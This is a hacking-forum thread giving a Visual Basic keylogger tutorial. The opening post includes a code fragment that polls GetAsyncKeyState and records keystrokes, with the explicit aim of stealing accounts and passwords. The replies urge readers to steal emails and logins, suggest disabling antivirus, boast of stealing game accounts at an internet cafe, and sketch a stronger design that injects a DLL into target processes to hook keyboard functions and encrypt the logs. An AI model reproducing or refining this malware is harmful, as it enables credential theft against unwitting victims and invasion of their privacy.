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[Video][Guide] Make your own keylogger [VB]


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What's up guyz?! Today i will show you how to make your own keylogger like these that they use to steal accs


Download Visual Basic Express Edition 2008 and then my own video .

Public Class Form1

Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer


For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i


Code credits: environmentalnerd53

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one question all antiviruses can find the keyloger? like virus?

well i don;t know if all antivirus finds keylogger as virus but i know if you off them they cannot find anything :P
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whats the purporse of this keyloger?

the purpose of any keylogger is to steal accs and whatever of pass you want


so think cleverly and steal e-mails, accs, pass!

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i think u should hide it..

with what posts?? 50/100?? it isn't the best share so i think that doesn't need hide


btw, i will do it!

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I always hate keyloggers :-] I used to use them to make ppl cry ...until some 1 used a keylogger against me :-[

yeah this is the bad


sometimes the things you do coming against to you :P

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i have made a keylogger a long time ago..in vb.. (i saw a video in youtube) and i used it at an internet cafe to steal l2 accounts :P

yeah this is the point of keylogger and if you use it smart then ...!!!
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that shouldn't work on other programs its  a crap method to record keystrokes


u first enumerate the process of the system

then select ur targets like firefox or a video game

then u are using dll injection method that u inject a dll to every targeted process

that dll holds an GetAsyncKeyState(); hook u can also hook DispatchMessage(); etc

then it makes an output into a file (its better that file to be encrypted)

then save the logs from every target u have choose to hook


thats how the keylogers work

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well i didn't really understand everything that you told but i have to say this


i am not a pr0 programmer like you! i know that you are good programmer but me not so good so i made a simple one keylogger!

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